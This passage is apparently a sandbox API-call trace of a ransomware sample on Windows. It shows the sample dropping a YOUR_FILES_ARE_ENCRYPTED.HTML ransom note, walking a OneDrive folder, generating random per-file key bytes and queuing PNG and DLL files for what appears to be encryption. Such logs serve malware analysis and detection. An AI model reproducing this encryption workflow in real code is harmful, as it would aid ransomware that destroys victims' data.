pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\rw\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.176] GetProcessHeap () returned 0x600000 [0113.176] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0113.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\rw\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\rw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0113.176] WriteFile (in: hFile=0x324, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.177] CloseHandle (hObject=0x324) returned 1 [0113.177] GetProcessHeap () returned 0x600000 [0113.177] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0113.177] GetProcessHeap () returned 0x600000 [0113.177] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0113.177] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55880b0b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x55880b0b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x55b558b3, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x124b, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ScreenshotLogo.png", cAlternateFileName="SCREEN~1.PNG")) returned 1 [0113.177] StrStrIW (lpFirst="ScreenshotLogo.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.177] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotLogo.png") returned 94 [0113.177] PathFindExtensionW (pszPath="ScreenshotLogo.png") returned=".png" [0113.177] lstrlenW (lpString=".png") returned 4 [0113.177] PathFindExtensionW (pszPath="ScreenshotLogo.png") returned=".png" [0113.177] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotLogo.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\screenshotlogo.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0113.177] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=4683) returned 1 [0113.177] GetProcessHeap () returned 0x600000 [0113.177] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0113.179] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="24") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="FF") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="98") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="46") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="01") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="6E") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="83") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="01") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="7D") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="20") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="02") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="34") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="03") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="E6") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="9C") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="5B") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="80") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="8A") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="B7") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="D1") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="F5") returned 2 [0113.179] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="1F") returned 2 [0113.179] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="66") returned 2 [0113.179] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="34") returned 2 [0113.179] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="63") returned 2 [0113.179] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="8C") returned 2 [0113.179] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="6F") returned 2 [0113.179] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="68") returned 2 [0113.179] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="C2") returned 2 [0113.179] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="7F") returned 2 [0113.179] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="25") returned 2 [0113.179] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="4E") returned 2 [0113.180] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotLogo.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotLogo.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotLogo.png" [0113.180] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.180] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0113.180] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55ee912c, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x55ee912c, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x56931178, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x6c00a, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ScreenshotOptIn.png", cAlternateFileName="SCREEN~2.PNG")) returned 1 [0113.180] StrStrIW (lpFirst="ScreenshotOptIn.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.180] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotOptIn.png") returned 95 [0113.180] PathFindExtensionW (pszPath="ScreenshotOptIn.png") returned=".png" [0113.180] lstrlenW (lpString=".png") returned 4 [0113.180] PathFindExtensionW (pszPath="ScreenshotOptIn.png") returned=".png" [0113.180] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.180] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotOptIn.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\screenshotoptin.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0113.181] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=442378) returned 1 [0113.181] GetProcessHeap () returned 0x600000 [0113.181] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30c81a0 [0113.196] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="35") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="FF") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="73") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="39") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="5D") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="A7") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="40") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="A6") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="02") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="FA") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="B8") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="2C") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="45") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="BB") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="AD") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="41") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="50") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="D0") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="E5") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="8D") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="62") returned 2 [0113.196] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="15") returned 2 [0113.196] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="D4") returned 2 [0113.196] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="B3") returned 2 [0113.196] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="6A") returned 2 [0113.197] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="8D") returned 2 [0113.197] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="58") returned 2 [0113.197] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="AA") returned 2 [0113.197] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="69") returned 2 [0113.197] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="1A") returned 2 [0113.197] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="68") returned 2 [0113.197] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="04") returned 2 [0113.197] lstrcpyW (in: lpString1=0x30d8254, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotOptIn.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotOptIn.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ScreenshotOptIn.png" [0113.197] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30c81a0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.197] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30c81a0, lpOverlapped=0x30c81a0) returned 1 [0113.198] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56d10fdf, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x56d10fdf, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x571d59f7, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x2ff40, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0113.198] StrStrIW (lpFirst="sqmapi.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.198] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\sqmapi.dll") returned 86 [0113.198] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0113.198] lstrlenW (lpString=".dll") returned 4 [0113.198] PathFindExtensionW (pszPath="sqmapi.dll") returned=".dll" [0113.199] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\sqmapi.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\sqmapi.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0113.199] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=196416) returned 1 [0113.199] GetProcessHeap () returned 0x600000 [0113.207] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.209] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="C1") returned 2 [0113.209] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="2A") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="E3") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="4C") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="48") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="CF") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="FB") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="C9") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="AC") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="A1") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="1E") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="4D") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="2D") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="63") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="E3") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="7A") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="CE") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="31") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="4B") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="E6") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="4E") returned 2 [0113.210] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="D3") returned 2 [0113.210] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="14") returned 2 [0113.210] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="4B") returned 2 [0113.210] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="1C") returned 2 [0113.210] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="41") returned 2 [0113.210] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="A7") returned 2 [0113.210] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="4C") returned 2 [0113.210] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="F9") returned 2 [0113.210] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="E9") returned 2 [0113.210] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="B1") returned 2 [0113.210] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="02") returned 2 [0113.211] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\sqmapi.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\sqmapi.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\sqmapi.dll" [0113.211] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.211] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.211] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57a07ba6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x57a07ba6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x57ef2857, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x9ac0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="SqmWrapper.dll", cAlternateFileName="SQMWRA~1.DLL")) returned 1 [0113.211] StrStrIW (lpFirst="SqmWrapper.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.211] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SqmWrapper.dll") returned 90 [0113.211] PathFindExtensionW (pszPath="SqmWrapper.dll") returned=".dll" [0113.211] lstrlenW (lpString=".dll") returned 4 [0113.211] PathFindExtensionW (pszPath="SqmWrapper.dll") returned=".dll" [0113.211] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SqmWrapper.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\sqmwrapper.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0113.215] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=39616) returned 1 [0113.215] GetProcessHeap () returned 0x600000 [0113.215] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.216] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="83") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="9F") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="2F") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="49") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="B0") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="BF") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="30") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="B5") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="13") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="E6") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="0C") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="F5") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="34") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="DD") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="D7") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="7C") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="99") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="83") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="C0") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="D7") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="DD") returned 2 [0113.216] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="F2") returned 2 [0113.216] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="A5") returned 2 [0113.216] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="FC") returned 2 [0113.216] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="3D") returned 2 [0113.216] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="F9") returned 2 [0113.216] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="E1") returned 2 [0113.216] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="7D") returned 2 [0113.216] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="2D") returned 2 [0113.217] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="8D") returned 2 [0113.217] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="6D") returned 2 [0113.217] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="20") returned 2 [0113.217] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SqmWrapper.dll" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SqmWrapper.dll") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SqmWrapper.dll" [0113.217] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.217] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.217] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a649506, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5a649506, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x624f252c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x3018c0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="SyncEngine.dll", cAlternateFileName="SYNCEN~1.DLL")) returned 1 [0113.217] StrStrIW (lpFirst="SyncEngine.dll", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.217] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SyncEngine.dll") returned 90 [0113.218] PathFindExtensionW (pszPath="SyncEngine.dll") returned=".dll" [0113.218] lstrlenW (lpString=".dll") returned 4 [0113.218] PathFindExtensionW (pszPath="SyncEngine.dll") returned=".dll" [0113.219] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\SyncEngine.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\syncengine.dll"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0113.219] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=3152064) returned 1 [0113.219] GetProcessHeap () returned 0x600000 [0113.219] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0113.224] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="5B") returned 2 [0113.224] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="DE") returned 2 [0113.224] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="EE") returned 2 [0113.224] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="E4") returned 2 [0113.224] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="53") returned 2 [0113.224] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="33") returned 2 [0113.224] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="D3") returned 2 [0113.224] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="97") returned 2 [0113.224] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="4A") returned 2 [0113.224] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="E7") returned 2 [0113.225] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="D0") returned 2 